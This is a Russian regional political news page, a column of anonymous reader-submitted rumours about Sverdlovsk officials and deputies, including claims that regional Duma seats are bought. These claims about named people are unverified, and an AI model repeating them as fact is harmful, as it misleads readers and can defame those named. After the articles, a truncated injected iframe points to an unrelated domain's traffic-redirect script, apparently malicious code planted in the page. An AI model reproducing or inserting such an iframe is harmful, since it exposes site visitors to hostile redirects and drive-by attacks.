Слухи сайта «ПолитСовет»

Редакция сайта «ПолитСовет» не несет никакой ответственности за достоверность информации, изложенной в рубрике «Слухи и Версии». Сами слухи присылаются нам нашими читателями и содержат их точку зрения на события, происходящие в политической жизни Урала и России.
Если Вы обладаете подобной информацией, присылайте свои материалы по адресу sluhi@politsovet.ru с пометкой «Слухи и Версии».

Слухи и версии, 27 ноября

Александра Мишарина начали сравнивать с ранним Путиным

Говорят, что в чиновничьих кругах с чьей-то подачи все более популярным становится сравнение нового главы региона с ранним Владимиром Путиным. По неофициальной информации, тренд «Как и тогда, молодой и энергичный руководитель пришел на смену стареющему лидеру» стал настоящей темой недели в разговорах данных граждан.

Впрочем, как уверяют слухмейкеры, в большинстве случаев в данной теории все же больше откровенного раболепия, нежели готовности на самом деле активно участвовать в проветривании политического воздуха в регионе.

Мария Серова готовится сдавать дела

Говорят, что министр финансов Свердловской области Мария Серова готовится к сдаче должности. По неофициальной информации, к выводу о том, что пора прибраться на рабочем столе, министр пришла после встречи с новым губернатором Свердловской области Александром Мишариным.

Как уверяют слухмейкеры, особенной неожиданностью принятое решение ни для кого не стало, так как, несмотря на общепризнанный профессионализм главного казначея Среднего Урала, работать в совершенно иных условиях она бы объективно не смогла.

Москва не поняла любовь «эсера» Александра Буркова к коммунисту Евгению Артюху

Говорят, что активно обсуждаемый в последние дни тайный союз Александра Буркова и Евгения Артюха не нашел понимания в федеральном руководстве «Справедливой России». По неофициальной информации, желание «эсера» Буркова привлечь в свой избирательный список коммуниста Артюха, которое завсегдатаи кулуаров приписывают депутату Госдумы, даже при всем цинизме среднеуральской политики показалось федералам несколько противоестественным.

Впрочем, как уверяют слухмейкеры, точку в истории ненормальной на первый взгляд связи ставить рано, ведь мало кто может со 100%-й уверенностью сказать, что хитрый Артюх официально является членом КПРФ, а значит, формально он может быть и не связан узами политического брака с «красными».

Связка «Баранов — Баланов» всем надоела

Говорят, что два веселых областных депутата Кирилл Баранов и Юрий Баланов начинают вызывать откровенное раздражение у правящего большинства. По неофициальной информации, позволяющие себе не поддерживать предложенного Кремлем губернатора и открыто критикующие «Единую Россию» народные избранники настолько выбились из привычной общей шеренги, что к ним уже готовы применить разного рода методы постановки на место, в частности — через руководителя областной ячейки ЛДПР Владимира Таскаева, а если понадобится — то и через лидера партии.

Впрочем, как уверяют слухмейкеры, сами господа Баланов и Баранов тактику своего поведения менять не намерены, ведь в отличие от многочисленных раздраженных желающих «одернуть» у них есть еще два года депутатства, а значит, и шалить можно без особых последствий.

Стоимость депутатского мандата не подвержена инфляции

Говорят, что, несмотря на кризис и прочие факторы экономического плана, условная стоимость кресла депутата Областной Думы осталась практически неизменной. По неофициальной информации, данный печальный факт выяснили для себя сразу несколько граждан из бизнес-среды, решивших позондировать почву на предмет своего возможного включения в списки.

Впрочем, как уверяют слухмейкеры, все то, что находится ниже условной проходной черты, действительно стоит относительно недорого, вот только платить за такие места, естественно, никто не готов.
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Февраль 2018    »
ПнВтСрЧтПтСбВс
 1234
567891011
12131415161718
19202122232425
262728 

Контакты